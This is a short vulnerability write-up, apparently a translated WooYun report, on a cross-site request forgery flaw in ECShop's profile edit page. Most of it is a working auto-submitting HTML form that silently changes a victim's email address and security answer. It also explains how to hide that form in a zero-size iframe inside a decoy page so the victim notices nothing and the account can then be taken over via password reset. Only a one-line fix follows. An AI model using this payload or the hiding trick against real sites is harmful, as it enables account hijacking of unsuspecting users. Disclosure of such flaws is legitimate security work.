Ecshop csrf can hijack and repair user accounts

Modify the unverified tokens in personal information, and use a specially crafted form to force the user to modify the email address to hijack the user. to hijack the user account, you only need to trick the target user into clicking a link.

<form id="csrf" action="http://127.0.0.1/ecshop/user.php" method="POST"><input type="hidden" name="email" value="root@wooyun.org"><input type="hidden" name="extend_field1" value="x@x.com"><input type="hidden" name="extend_field2" value="123123"><input type="hidden" name="extend_field3" value="11111111"><input type="hidden" name="extend_field4" value="11111111"><input type="hidden" name="extend_field5" value="11111111111"><input type="hidden" name="sel_question" value="friend_birthday"><input type="hidden" name="passwd_answer" value="x"><input type="hidden" name="act" value="act_edit_profile"></form><script>csrf.submit()</script>

 

After a user accesses the email address, the system automatically submits a form to modify the user's email address.
After accessing the form before the access (the email address is modified), however, after the form is accessed and automatically submitted, the modified page is displayed, which is clearly not the expected result. Therefore, as a perfectionist, we can prepare another normal page (such as a news page), iframe the POC, and height = 0, width = 0, in this way, the user may be inadvertently hijacked. The Code is as follows: <iframe src = "POC.htm" height = "0" width = "0"> </iframe> after successful hijacking, you can change the password.
  Solution:

Random tokens should be verified for all operations involving user information.